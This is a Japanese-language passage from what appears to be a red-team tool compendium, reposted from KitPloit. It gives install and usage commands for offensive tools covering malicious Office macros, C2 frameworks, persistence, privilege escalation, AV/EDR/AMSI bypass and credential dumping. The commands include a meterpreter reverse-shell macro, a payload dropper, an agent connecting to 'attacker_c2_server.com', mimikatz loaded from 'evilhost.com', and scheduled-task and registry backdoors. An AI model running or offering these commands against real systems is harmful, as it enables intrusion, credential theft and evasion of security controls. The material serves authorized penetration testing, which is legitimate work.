1. 最新のバイナリを[https://github.com/sevagas/macro_pack/releases/](https://github.com/sevagas/macro_pack/releases/)から入手してください。
2. 正規のMicrosoft OfficeがインストールされているPCにバイナリをダウンロードします。
3. コンソールを開き、CDでバイナリディレクトリに移動し、バイナリを実行します。

**インストール: (Git)**```bash
git clone https://github.com/sevagas/macro_pack.git
cd macro_pack
pip3 install -r requirements.txt

使い方:```bash

Help Page

python3 macro_pack.py --help

List all supported file formats

macro_pack.exe --listformats

Obfuscate the vba file generated by msfvenom and puts result in a new VBA file.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.5 -f vba | macro_pack.exe -o -G meterobf.vba

Obfuscate Empire stager VBA file and generate a MS Word document:

macro_pack.exe -f empire.vba -o -G myDoc.docm

Generate an MS Excel file containing an obfuscated dropper (download payload.exe and store as dropped.exe)

echo "https://myurl.url/payload.exe" "dropped.exe" | macro_pack.exe -o -t DROPPER -G "drop.xlsm"

Execute calc.exe via Dynamic Data Exchange (DDE) attack

echo calc.exe | macro_pack.exe --dde -G calc.xslx

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/05a46a14fba117c71b6b79cec0cccbc403531a302add46b9e55035e7d9d634ef.png)

### [🔙](#tool-list)[PowerSploit](https://github.com/PowerShellMafia/PowerSploit)

PowerShellスクリプトとモジュールのコレクションで、さまざまなレッドチーム活動の目的を達成するために使用できます。

PowerSploitの機能の一部:

- パスワードハッシュのダンプとメモリからの平文パスワードの抽出
- 特権の昇格とセキュリティ制御のバイパス
- 任意のPowerShellコードの実行と実行制限のバイパス
- ネットワーク偵察と発見の実行
- ペイロードの生成とエクスプロイトの実行

**インストール:** _1. PowerShellモジュールフォルダに保存する_

まず、[PowerSploitフォルダ](https://github.com/PowerShellMafia/PowerSploit)をダウンロードし、PowerShellモジュールフォルダに保存する必要があります。

PowerShellモジュールフォルダのパスは、次のコマンドで確認できます:```
$Env:PSModulePath

Install: 2. PowerSploit を PowerShell モジュールとしてインストール

次に、PowerSploit モジュールをインストールする必要があります (ダウンロードしたフォルダの名前を使用します)。

Note: PowerShell の実行ポリシーによってブロックされる可能性があります。これを修正するには、次のコマンドを実行してください。``` powershell.exe -ep bypass

root@kitploit:~
これでPowerSploitモジュールをインストールできます。```
Import-Module PowerSploit

使用方法:``` Get-Command -Module PowerSploit

root@kitploit:~
![画像](https://assets.kitploit.com/production/public/readmes/495/be1d37fac661a710be1a2268f5f0090e13b496c05f8d22b56d47e166072e5fff.png)

### [🔙](#tool-list)[Rubeus](https://github.com/GhostPack/Rubeus)

Microsoft Active Directory (AD) 環境に関連するさまざまなアクション(パスワードハッシュのダンプ、ユーザーの作成/削除、ユーザープロパティの変更など)を実行するために使用できるツールです。

Rubeusの機能の一部:

- Kerberoasting
- Golden ticket attacks
- Silver ticket attacks

**インストール: (ダウンロード)**

非公式のプリコンパイル済みRubeusバイナリは[こちら](https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/blob/master/Rubeus.exe)からインストールできます。

**インストール: (コンパイル)**

Rubeusは[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)と互換性があります。rubeusの[プロジェクト .sln](https://github.com/GhostPack/Rubeus)を開き、"Release"を選択してビルドしてください。

**使用方法:**```
Rubeus.exe -h

image

🔙SharpUp

被害者のエンドポイントをチェックして、高整合性プロセス、グループ、ハイジャック可能なパスなどの脆弱性を検出する便利なツールです。

インストール:(ダウンロード)

非公式のプリコンパイル済みSharpUpバイナリはこちらからインストールできます。

インストール:(コンパイル)

SharpUpはVisual Studio 2015 Community Editionと互換性があります。SharpUpのプロジェクト .slnを開き、「Release」を選択してビルドしてください。

使用方法:```bash SharpUp.exe audit #-> Runs all vulnerability checks regardless of integrity level or group membership.

SharpUp.exe HijackablePaths #-> Check only if there are modifiable paths in the user's %PATH% variable.

SharpUp.exe audit HijackablePaths #-> Check only for modifiable paths in the user's %PATH% regardless of integrity level or group membership.

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/881494f39c898e7951e05d177aeaef111636ae85c7a4c9a607f337e3318f7d77.png)

### [🔙](#tool-list)[SQLRecon](https://github.com/skahwah/SQLRecon)

MS-SQL (Microsoft SQL Server) は、Microsoft が開発および販売するリレーショナルデータベース管理システムです。

この C# MS-SQL ツールキットは、攻撃的な偵察とポストエクスプロイテーションのために設計されています。各テクニックの詳細な使用方法については、[wiki](https://github.com/skahwah/SQLRecon/wiki) を参照してください。

**インストール: (バイナリ)**

最新のバイナリリリースは [こちら](https://github.com/skahwah/SQLRecon/releases) からダウンロードできます。

**使用法:**```bash
# Authenticating using Windows credentials
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# Authenticating using Local credentials
SQLRecon.exe -a Local -s SQL02 -d master -u sa -p Password123 -m whoami

# Authenticating using Azure AD credentials
SQLRecon.exe -a azure -s azure.domain.com -d master -r domain.com -u skawa -p Password123 -m whoami

# Run whoami
SQLRecon.exe -a Windows -s SQL01 -d master -m whoami

# View databases
SQLRecon.exe -a Windows -s SQL01 -d master -m databases

# View tables
SQLRecon.exe -a Windows -s SQL01 -d master -m tables -o AdventureWorksLT2019

完全な使用方法は wiki にあります。

ツールモジュールの使用方法は こちら にあります。

image

SQLReconヘルプページから使用された画像

🔙UltimateAppLockerByPassList

このリソースは、AppLocker をバイパスするための最も一般的で既知の手法のコレクションです。

AppLocker はさまざまな方法で構成できるため、@api0cradle は、検証済みのバイパスリスト(デフォルトの AppLocker ルールに対して機能するもの)と、可能なバイパス手法(構成に依存する)または誰かによってバイパスであると主張されているもののリストを管理しています。

また、汎用的なバイパス手法のリストと、DLL を介して実行するためのレガシーな手法のリストもあります。

索引リスト

  • Generic-AppLockerbypasses.md
  • VerifiedAppLockerBypasses.md
  • UnverifiedAppLockerBypasses.md
  • DLL-Execution.md

image

画像は https://github.com/api0cradle/UltimateAppLockerByPassList から使用されました

🔙StarFighters

独自の埋め込み PowerShell ホスト内で実行される、JavaScript および VBScript ベースの Empire ランチャー。

両方のランチャーは独自の埋め込み PowerShell ホスト内で実行されるため、PowerShell.exe は必要ありません。

これは、企業が PowerShell.exe をブロックしている、またはアプリケーションのホワイトリストソリューションを使用しているが JS/VBS ファイルの実行をブロックしていない場合に役立つ可能性があります。

Usage:

  • PowerShell Empire 内で新しいリスナーをセットアップする
  • ランチャーコマンドを使用して、このリスナー用の PowerShell ランチャーを生成する
  • StarFighter JavaScript または VBScript ファイル内の Base64 エンコードされたランチャーペイロードをコピーして置き換える

JavaScript バージョンの場合は、以下の変数を使用します。```javascript var EncodedPayload = "";

root@kitploit:~
VBScript版では以下の変数を使用してください:```vbscript
  Dim EncodedPayload: EncodedPayload = "<Paste Encoded Launcher Payload Here>"
  • その後、ターゲット上で wscript.exe StarFighter.js または StarFighter.vbs を実行するか、Explorer内でランチャーをダブルクリックします。

image

画像提供元:https://www.hackplayers.com/2017/06/startfighters-un-launcher-de-empire-en-js-vbs.html

🔙demiguise

このプロジェクトの目的は、暗号化されたHTAファイルを含む.htmlファイルを生成することです。

アイデアは、ターゲットがページにアクセスすると、キーが取得され、ブラウザ内で動的にHTAが復号化され、直接ユーザーにプッシュされるというものです。

これは、一部のセキュリティアプライアンスが実装するコンテンツ/ファイルタイプ検査を回避するための回避技術です。

詳細な技術情報はこちらをご覧ください。

インストール:``` git clone https://github.com/nccgroup/demiguise cd demiguise

root@kitploit:~
**使用法:**```bash
# Generate an encrypted .hta file that executes notepad.exe
python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta

image

使用元: https://github.com/nccgroup/demiguise

永続性

🔙Impacket

Impacketは、SMB、Kerberos、LDAPを含むさまざまなネットワークプロトコル用の低レベルPythonバインディングと、ネットワークサービスと対話し、パスワードハッシュのダンプやネットワーク共有の作成などの特定のタスクを実行するための高レベルライブラリを提供します。

また、SAMデータベースのダンプ、ドメイン信頼の列挙、Windowsパスワードのクラックなど、さまざまなタスクを実行するためのコマンドラインツールも多数含まれています。

インストール:```bash python3 -m pip install impacket

root@kitploit:~
**インストール:(サンプルスクリプト付き)**

[パッケージ](https://github.com/fortra/impacket) をダウンロードして解凍し、インストールフォルダに移動して実行してください...```bash
python3 -m pip install .

使い方:```bash

Extract NTLM hashes with local files

secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL

Gets a list of the sessions opened at the remote hosts

netview.py domain/user:password -target 192.168.10.2

Retrieves the MSSQL instances names from the target host.

mssqlinstance.py 192.168.1.2

This script will gather data about the domain's users and their corresponding email addresses.

GetADUsers.py domain/user:password@IP

root@kitploit:~
優れた[チートシート](https://cheatsheet.haax.fr/windows-systems/exploitation/impacket/)(Impacket 使用のための)です。

![image](https://assets.kitploit.com/production/public/readmes/495/2be6291c92daeeea07d0afe27bcf2ecde2bd9676d07e84e8b7c6ee823887e902.png)

### [🔙](#tool-list)[Empire](https://github.com/EmpireProject/Empire)

Empire は、被害者システムとのリモート接続を確立するためのペイロードを生成できるポストエクスプロイテーションフレームワークです。

被害者システム上でペイロードが実行されると、Empire サーバーへの接続が確立され、その接続を使用してコマンドを発行し、対象システムを制御できます。

Empire には、パスワードハッシュのダンプ、Windows レジストリへのアクセス、データの窃取などの特定のタスクを実行するための組み込みモジュールやスクリプトも多数含まれています。

**インストール:**```bash
git clone https://github.com/EmpireProject/Empire
cd Empire
sudo ./setup/install.sh

使い方:```bash

Start Empire

./empire

List live agents

list agents

List live listeners

list listeners

root@kitploit:~
便利な使い方の[チートシート](https://github.com/HarmJ0y/CheatSheets/blob/master/Empire.pdf)(作成者:[HarmJoy](https://github.com/HarmJ0y))。

![image](https://assets.kitploit.com/production/public/readmes/495/3dec2ca6692f2b6431159a32830e854fa994824b8bcf12c797c0bda8a186519d.png)

### [🔙](#tool-list)[SharPersist](https://github.com/mandiant/SharPersist)

C#で書かれたWindows永続化ツールキット。

このプロジェクトには[Wiki](https://github.com/mandiant/SharPersist/wiki)があります。

**インストール:(バイナリ)**

最新のリリースは[こちら](https://github.com/mandiant/SharPersist/releases)から入手できます。

**インストール:(コンパイル)**

- [GitHubリポジトリ](https://github.com/mandiant/SharPersist)からプロジェクトファイルをダウンロードします。
- Visual Studioプロジェクトを開き、「ツール」→「NuGet パッケージ マネージャー」→「パッケージ マネージャー設定」に進みます。
- 「NuGet パッケージ マネージャー」→「パッケージ ソース」に進みます。
- URL「https://api.nuget.org/v3/index.json」でパッケージソースを追加します。
- Costura.Fody NuGetパッケージをインストールします。Visual Studio 2019を必要としないために、古いバージョンのCostura.Fody(3.3.3)が必要です。
  - `Install-Package Costura.Fody -Version 3.3.3`
- TaskSchedulerパッケージをインストールします。
  - `Install-Package TaskScheduler -Version 2.8.11`
- これでプロジェクトを自分でビルドできます!

**使い方:**

使用例の完全なリストは[こちら](https://github.com/mandiant/SharPersist#adding-persistence-triggers-add)にあります。```
#KeePass
SharPersist -t keepass -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "C:\Users\username\AppData\Roaming\KeePass\KeePass.config.xml" -m add

#Registry
SharPersist -t reg -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -k "hkcurun" -v "Test Stuff" -m add

#Scheduled Task Backdoor
SharPersist -t schtaskbackdoor -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -n "Something Cool" -m add

#Startup Folder
SharPersist -t startupfolder -c "C:\Windows\System32\cmd.exe" -a "/c calc.exe" -f "Some File" -m add

image

🔙ligolo-ng

Ligolo-ngは、ペネトレーションテスターがtunインターフェースを使用してリバースTCP/TLS接続からトンネルを確立できるようにする、シンプルで軽量かつ高速なツールです(SOCKSは不要)。

SOCKSプロキシやTCP/UDPフォワーダーを使用する代わりに、Ligolo-ngはGvisorを使用してユーザーランドネットワークスタックを作成します。

リレー/プロキシサーバーを実行すると、tunインターフェースが使用され、このインターフェースに送信されたパケットが変換され、エージェントのリモートネットワークに送信されます。

インストール: (ダウンロード)

プリコンパイル済みバイナリ(Windows/Linux/macOS)はリリースページから入手できます。

インストール: (ビルド)

Ligolo-ngのビルド(Go >= 1.17が必要):```bash go build -o agent cmd/agent/main.go go build -o proxy cmd/proxy/main.go

Build for Windows

GOOS=windows go build -o agent.exe cmd/agent/main.go GOOS=windows go build -o proxy.exe cmd/proxy/main.go

root@kitploit:~
**セットアップ: (Linux)**```bash
sudo ip tuntap add user [your_username] mode tun ligolo
sudo ip link set ligolo up

セットアップ: (Windows)

Wintun ドライバー (WireGuard で使用) をダウンロードし、wintun.dll を Ligolo と同じフォルダに配置する必要があります (正しいアーキテクチャを使用していることを確認してください)。

セットアップ: (プロキシサーバー)```bash ./proxy -h # Help options ./proxy -autocert # Automatically request LetsEncrypt certificates

root@kitploit:~
**使用法:**

_ターゲット(被害者)のコンピュータ上でエージェントを起動します(権限は必要ありません!):_```bash
./agent -connect attacker_c2_server.com:11601

プロキシサーバーにセッションが表示されるはずです。``` INFO[0102] Agent joined. name=nchatelain@nworkstation remote="XX.XX.XX.XX:38000"

root@kitploit:~
session コマンドを使用してエージェントを選択します。```
ligolo-ng » session
? Specify a session : 1 - nchatelain@nworkstation - XX.XX.XX.XX:38000

Full usage information can be found here.

image

画像の出典: https://github.com/nicocha30/ligolo-ng#demo

権限昇格

🔙LinPEAS

LinPEASは、Linuxエンドポイント上のローカル権限昇格(privesc)経路を見つけるための、詳細な情報を提供する優れた権限昇格ツールです。

インストールと使用方法:```bash curl -L "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" | sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/75977a81eeb607a2ef06b8524e1792579aa3dc5b245596ee7eeed5938d75f279.png)

### [🔙](#tool-list)[WinPEAS](https://github.com/carlospolop/PEASS-ng/tree/master/winPEAS)

WinPEAS は、Windows エンドポイント上のローカル特権昇格経路を見つけるための、優れた詳細な特権昇格ツールです。

**インストール + 使用方法:**```bash
$wp=[System.Reflection.Assembly]::Load([byte[]](Invoke-WebRequest "https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASany_ofs.exe" -UseBasicParsing | Select-Object -ExpandProperty Content)); [winPEAS.Program]::Main("")

image

🔙linux-smart-enumeration

Linux smart enumerationは、もう一つの優れた、より簡潔なLinux権限昇格ツールです。

インストール + 使用法:```bash curl "https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh" -Lo lse.sh;chmod 700 lse.sh

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0d46a6a3c94f9ce73617ebb098962e9d6d630489e557e57adba93bd24d562808.png)

### [🔙](#tool-list)[Certify](https://github.com/GhostPack/Certify)

Certify は、Active Directory 証明書サービス (AD CS) における設定ミスを列挙し悪用するための C# ツールです。

Certify は、Mimikatz や PowerShell などの他のレッドチームツールやテクニックと組み合わせて使用するように設計されており、レッドチームが中間者攻撃、なりすまし攻撃、権限昇格攻撃など、さまざまな種類の攻撃を実行できるようにします。

**Certify の主な機能:**

- 証明書の作成
- 証明書の署名
- 証明書のインポート
- 証明書の信頼設定の変更

**インストール: (コンパイル)**

Certify は [Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/) と互換性があります。Certify プロジェクトの [.sln](https://github.com/GhostPack/Certify) ファイルを開き、"Release" を選択してビルドします。

**インストール: (PowerShell 経由で Certify を実行する)**

Certify を PowerShell ラッパーを通じてメモリ内で実行するには、まず Certify をコンパイルし、結果のアセンブリを base64 エンコードします。```bash
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Certify.exe")) | Out-File -Encoding ASCII C:\Temp\Certify.txt

Certify は、以下のように PowerShell スクリプトに読み込むことができます("aa..." は base64 エンコードされた Certify アセンブリ文字列に置き換えてください):``` $CertifyAssembly = [System.Reflection.Assembly]::Load([Convert]::FromBase64String("aa..."))

root@kitploit:~
Main()メソッドと任意の引数は、次のように呼び出すことができます:```
[Certify.Program]::Main("find /vulnerable".Split())

完全なコンパイル手順はこちらにあります。

使用法:```bash

See if there are any vulnerable templates

Certify.exe find /vulnerable

Request a new certificate for a template/CA, specifying a DA localadmin as the alternate principal

Certify.exe request /ca:dc.theshire.local\theshire-DC-CA /template:VulnTemplate /altname:localadmin

root@kitploit:~
完全な例のウォークスルーは[こちら](https://github.com/GhostPack/Certify#example-walkthrough)にあります。

![image](https://assets.kitploit.com/production/public/readmes/495/d984105311fed30083e84cdfaa7b63d2f22b85f5dbb448a7162e102241203e1f.png)

### [🔙](#tool-list)[Get-GPPPassword](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-GPPPassword.ps1)

Get-GPPPasswordはPowerSploitツールキットの一部であるPowerShellスクリプトであり、グループポリシーの基本設定(GPP)を使用して作成および管理されるローカルアカウントのパスワードを取得するように設計されています。

Get-GPPPasswordは、ドメインコントローラ上のSYSVOLフォルダ内で、パスワード情報を含むGPPファイルを検索することで動作します。これらのファイルを見つけると、パスワード情報を復号化してユーザーに表示します。

**インストール:**

このツールシートのPowerSploit[インストール手順](https://github.com/A-poc/RedTeam-Tools#powersploit)に従ってください。```bash
powershell.exe -ep bypass
Import-Module PowerSploit

使用方法:```bash

Get all passwords with additional information

Get-GPPPassword

Get list of all passwords

Get-GPPPassword | ForEach-Object {$_.passwords} | Sort-Object -Uniq

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/2274ad1205f7c6b2db0c3511427e21868bb0d4ba5e2bad1171156819ce417662.png)

### [🔙](#tool-list)[Sherlock](https://github.com/rasta-mouse/Sherlock)

ローカル特権昇格の脆弱性に対する不足しているソフトウェアパッチを迅速に見つけるためのPowerShellスクリプト。

_サポート対象:_

- MS10-015 : ユーザーモードからリングへ (KiTrap0D)
- MS10-092 : タスクスケジューラ
- MS13-053 : NTUserMessageCall Win32k カーネルプールオーバーフロー
- MS13-081 : TrackPopupMenuEx Win32k NULL ページ
- MS14-058 : TrackPopupMenu Win32k ヌルポインタ参照
- MS15-051 : ClientCopyImage Win32k
- MS15-078 : フォントドライババッファオーバーフロー
- MS16-016 : 'mrxdav.sys' WebDAV
- MS16-032 : セカンダリログオンハンドル
- MS16-034 : Windows カーネルモードドライバのEoP
- MS16-135 : Win32k 特権昇格
- CVE-2017-7199 : Nessus Agent 6.6.2 - 6.10.3 権限昇格

**インストール: (PowerShell)**```bash
# Git install
git clone https://github.com/rasta-mouse/Sherlock

# Load powershell module
Import-Module -Name C:\INSTALL_LOCATION\Sherlock\Sherlock.ps1

使用方法: (PowerShell)```bash

Run all functions

Find-AllVulns

Run specific function (MS14-058 : TrackPopupMenu Win32k Null Pointer Dereference)

Find-MS14058

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/0a46401aa0ece2211b30e76a9d2138453ec5f98cfb69416a2607084c10612993.png)

_使用された画像: https://vk9-sec.com/sherlock-find-missing-windows-patches-for-local-privilege-escalation/_

### [🔙](#tool-list)[Watson](https://github.com/rasta-mouse/Watson)

Watsonは、不足しているKBを列挙し、特権昇格の脆弱性に対するエクスプロイトを提案するために設計された.NETツールです。

不足しているパッチを特定し、システムでより高い特権を獲得するために既知の脆弱性を悪用するために使用できるエクスプロイトを提案するのに最適です。

**インストール:**

[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)を使用して、[Watsonプロジェクトの.sln](https://github.com/rasta-mouse/Watson)を開き、「Release」を選択してビルドします。

**使用方法:**```bash
# Run all checks
Watson.exe

image

画像のテキストは https://github.com/rasta-mouse/Watson#usage から使用

🔙ImpulsiveDLLHijack

C# ベースのツールで、ターゲットバイナリにおける DLL ハイジャックの発見と悪用を自動化します。

発見されたハイジャックパスは、攻撃中に EDR を回避するために武器化することができます。

インストール:

  • Procmon.exe -> https://docs.microsoft.com/en-us/sysinternals/downloads/procmon
  • カスタム確認用 DLL :
    • これらの DLL ファイルは、特定したハイジャックパスから DLL が正常にロードされたかどうかを確認するツールを支援します。
    • 上記の MalDLL プロジェクトからコンパイル(または、私を信頼するならプリコンパイル済みバイナリを使用)
    • 32 ビット DLL 名: maldll32.dll
    • 64 ビット DLL 名: maldll64.dll
    • NuGet パッケージのインストール: PeNet -> https://www.nuget.org/packages/PeNet/ (ImpulsiveDLLHijack プロジェクトのコンパイルに必要な前提条件)

注意: i と ii の前提条件は、ImpulsiveDLLHijack.exe 自体のディレクトリに配置する必要があります。

  • ビルドとセットアップ情報:

    • ImpulsiveDLLHijack

      • リポジトリを Visual Studio でクローン
      • プロジェクトが Visual Studio に読み込まれたら、"プロジェクト" --> "NuGet パッケージの管理" --> パッケージを参照し、"PeNet"(https://www.nuget.org/packages/PeNet/)をインストール
      • ビルドを実行!
      • ImpulsiveDLLHijack.exe は bin ディレクトリ内に生成されます。
    • 確認用 DLL について:

      • リポジトリを Visual Studio でクローン
      • x86 および x64 でプロジェクトをビルド
      • x86 リリースを maldll32.dll、x64 リリースを maldll64.dll にリネーム
    • セットアップ: 確認用 DLL(maldll32 と maldll64)を ImpulsiveDLLHijack.exe のディレクトリにコピーし、ImpulsiveDLLHijack.exe を実行します :))

インストール手順は https://github.com/knight0x07/ImpulsiveDLLHijack#2-prerequisites から

使用方法:```bash

Help

ImpulsiveDLLHijack.exe -h

Look for vulnerabilities in an executable

ImpulsiveDLLHijack.exe -path BINARY_PATH

root@kitploit:~
使用例は[こちら](https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples)をご覧ください。

![image](https://assets.kitploit.com/production/public/readmes/495/acedd276f532d4b77d4a5f9d0d93f9d926ba6b0afd1da582b94410c32eb47ea1.png)

_https://github.com/knight0x07/ImpulsiveDLLHijack#4-examples より引用した画像_

### [🔙](#tool-list)[ADFSDump](https://github.com/mandiant/ADFSDump)

AD FS からあらゆる有用な情報をダンプするための C# ツール。

Mandiant FireEye 在籍時の Doug Bienstock [@doughsec](https://twitter.com/doughsec) によって作成されました。

このツールは ADFSpoof と組み合わせて使用するように設計されています。ADFSdump は、ADFSpoof を使用してセキュリティトークンを生成するために必要なすべての情報を出力します。

**必要条件:**

- ADFSDump は、AD FS サービスアカウントのユーザーコンテキストで実行する必要があります。この情報は、AD FS サーバーでプロセス一覧を実行するか、Get-ADFSProperties コマンドレットの出力から取得できます。構成データベースにアクセスするために必要なアクセス許可を持っているのは、AD FS サービスアカウントだけです。DA でさえアクセスできません。
- ADFSDump は、サービスが Windows Internal Database (WID) を使用するように構成されていることを前提としています。外部 SQL サーバーをサポートすることは簡単ですが、現時点ではこの機能は存在しません。
- ADFSDump は AD FS サーバー上でローカルに実行する必要があり、AD FS Web アプリケーションプロキシでは実行できません。WID は名前付きパイプを介してローカルからのみアクセスできます。

**インストール: (コンパイル)**

ADFSDump は Visual Studio 2017 Community Edition を使用して .NET 4.5 に対してビルドされました。プロジェクトの .sln ファイルを開き、"Release" を選択してビルドするだけです。

**使用方法: (フラグ)**```bash
# The Active Directory domain to target. Defaults to the current domain.
/domain:

# The Domain Controller to target. Defaults to the current DC.
/server:

# Switch. Toggle to disable outputting the DKM key.
/nokey

# (optional) SQL connection string if ADFS is using remote MS SQL rather than WID.
/database

Blog - ADFSに対するGolden SAML攻撃の探求

image

画像は https://www.orangecyberdefense.com/global/blog/cloud/exploring-the-golden-saml-attack-against-adfs から使用

防御回避

🔙Invoke-Obfuscation

PowerShell v2.0+互換のPowerShellコマンドおよびスクリプト難読化ツールです。犠牲となるエンドポイントがPowerShellを実行できる場合、このツールは高度に難読化されたスクリプトを作成するのに最適です。

インストール:```bash git clone https://github.com/danielbohannon/Invoke-Obfuscation.git

root@kitploit:~
**使用法:**```bash
./Invoke-Obfuscation

image

🔙Veil

Veilは、一般的なアンチウイルスソリューションを回避するmetasploitペイロードを生成するためのツールです。

難読化されたシェルコードの生成に使用できます。詳細については、公式のveil framework ブログを参照してください。

インストール: (Kali)```bash apt -y install veil /usr/share/veil/config/setup.sh --force --silent

root@kitploit:~
**インストール: (Git)**```bash
sudo apt-get -y install git
git clone https://github.com/Veil-Framework/Veil.git
cd Veil/
./config/setup.sh --force --silent

使用方法:```bash

List all payloads (–list-payloads) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-payloads

List all encoders (–list-encoders) for the tool Ordnance (-t Ordnance)

./Veil.py -t Ordnance --list-encoders

Generate a reverse tcp payload which connects back to the ip 192.168.1.20 on port 1234

./Veil.py -t Ordnance --ordnance-payload rev_tcp --ip 192.168.1.20 --port 1234

List all payloads (–list-payloads) for the tool Evasion (-t Evasion)

./Veil.py -t Evasion --list-payloads

Generate shellcode using Evasion, payload number 41, reverse_tcp to 192.168.1.4 on port 8676, output file chris

./Veil.py -t Evasion -p 41 --msfvenom windows/meterpreter/reverse_tcp --ip 192.168.1.4 --port 8676 -o chris

root@kitploit:~
Veilの作成者は、オードナンスと回避のコマンドライン使用法について詳しく説明した[ブログ記事](https://www.veil-framework.com/veil-command-line-usage/)を公開しています。

![image](https://assets.kitploit.com/production/public/readmes/495/81bc6fbd0f46783257bcb6d33b67781336ee9d270182aeff0e5e568f8ac4e613.png)

### [🔙](#tool-list)[SharpBlock](https://github.com/CCob/SharpBlock)

エントリポイントの実行を防ぐことで、EDRのアクティブなプロジェクションDLLをバイパスする手法。

**特徴:**

- EDR DLLのエントリポイント実行をブロックし、EDRフックが配置されるのを防ぎます。
- 実行時にAmsi.dllのコードパッチを探すスキャナーから検出不可能な、パッチレスAMSIバイパス。
- ディスク、HTTP、または名前付きパイプ(Cobalt Strike)からロード可能なインプラントPEに置き換えられるホストプロセス。
- インプラントされたプロセスは非表示になり、ホロー化されたプロセスを探すスキャナーを回避するのに役立ちます。
- コマンドライン引数は偽装され、ステルスなEDR検出方法を使用してプロセス作成後にインプラントされます。
- パッチレスETWバイパス。
- 呼び出し先がブロックされたDLLのアドレス空間の範囲内にある場合、NtProtectVirtualMemoryの呼び出しをブロックします。

**インストール:**

SharpBlockバイナリをコンパイルするには、[Visual Studio 2019 Community Edition](https://visualstudio.microsoft.com/vs/community/)を使用します。

SharpBlockの[プロジェクト .sln](https://github.com/CCob/SharpBlock)を開き、"Release"を選択してビルドします。

**使用方法:**```bash
# Launch mimikatz over HTTP using notepad as the host process, blocking SylantStrike's DLL
SharpBlock -e http://evilhost.com/mimikatz.bin -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee

# Launch mimikatz using Cobalt Strike beacon over named pipe using notepad as the host process, blocking SylantStrike's DLL
execute-assembly SharpBlock.exe -e \\.\pipe\mimi -s c:\windows\system32\notepad.exe -d "Active Protection DLL for SylantStrike" -a coffee
upload_file /home/haxor/mimikatz.exe \\.\pipe\mimi

PenTestPartnersの素晴らしいブログ記事 こちら.

image

画像の出典: https://youtu.be/0W9wkamknfM

🔙Alcatraz

Alcatrazは、GUI x64バイナリ難読化ツールであり、以下のさまざまなPEファイルを難読化できます:

  • .exe
  • .dll
  • .sys

サポートされている難読化機能の一部は以下の通りです:

  • 即値移動の難読化
  • 制御フローの平坦化
  • ADD変異
  • エントリポイントの難読化
  • Lea難読化

インストール: (必要条件)

インストール: https://vcpkg.io/en/getting-started.html```bash vcpkg.exe install asmjit:x64-windows vcpkg.exe install zydis:x64-windows

root@kitploit:~
**使用方法:**

GUIを使用してバイナリを難読化する方法:

1. 左上隅の`file`をクリックしてバイナリを読み込みます。
2. `Functions`ツリーを展開して関数を追加します。(上部の検索バーに名前を入力して検索できます)
3. `compile`を押します(**注:** _多くの関数を難読化するには数秒かかることがあります_)

![image](https://assets.kitploit.com/production/public/readmes/495/98ae60c1a4f287f33bd749166514e95f2ba9cdab72850a77025dd743ca52e32a.png)

_画像提供: https://github.com/weak1337/Alcatraz_

### [🔙](#tool-list)[Mangle](https://github.com/optiv/Mangle)

Mangleは、コンパイルされた実行可能ファイル(.exeまたはDLL)のさまざまな側面を操作するツールです。

Mangleは、既知の侵害指標(IoC)に基づく文字列を削除してランダムな文字に置き換え、ファイルサイズを増加させてEDRを回避するように変更し、正当なファイルからコード署名証明書をクローンすることができます。

これにより、Mangleはローダーがオンディスクおよびインメモリスキャナーを回避するのに役立ちます。

**インストール:**

最初のステップは、いつも通りリポジトリをクローンすることです。Mangleをコンパイルする前に、依存関係をインストールする必要があります。それらをインストールするには、次のコマンドを実行します:```
go get github.com/Binject/debug/pe

次にビルドしてください``` git clone https://github.com/optiv/Mangle cd Mangle go build Mangle.go

root@kitploit:~
**使用方法:**```bash
  -C string
        Path to the file containing the certificate you want to clone
  -I string
        Path to the orginal file
  -M    Edit the PE file to strip out Go indicators
  -O string
        The new file name
  -S int
        How many MBs to increase the file by

完全な使用方法はこちらにあります。

image

画像は https://github.com/optiv/Mangle から引用

🔙AMSI Fail

AMSI.fail は、現在のプロセスの AMSI を無効化または回避する難読化された PowerShell スニペットを生成する優れたウェブサイトです。

スニペットは、少数のテクニック/バリエーションのプールからランダムに選択され、その後難読化されます。すべてのスニペットは実行時/リクエスト時に難読化されるため、生成された出力に同じシグネチャが共有されることはありません。

AMSI について説明している素晴らしい F-Secure ブログはこちらです。

image

画像は http://amsi.fail/ から引用

資格情報アクセス

🔙Mimikatz

被害者のエンドポイントからハッシュ化および平文のパスワードを取得するための優れたツールです。システムへの特権アクセスを取得したら、このツールをドロップして資格情報を収集します。

インストール:

  1. mimikatz_trunk.7z ファイルをダウンロードします。
  2. ダウンロード後、mimikatz.exe バイナリは x64 フォルダにあります。

使用方法:```bash .\mimikatz.exe privilege::debug

root@kitploit:~
![image](https://assets.kitploit.com/production/public/readmes/495/a66e3040f581c95c762704952a34495375ffc7d58ad12074d747869851a40ad6.png)

### [🔙](#tool-list)[LaZagne](https://github.com/AlessandroZ/LaZagne)

ブラウザ、データベース、ゲーム、メール、git、WiFiなどからローカルに保存されたパスワードを抽出する便利なツールです。

**インストール: (バイナリ)**

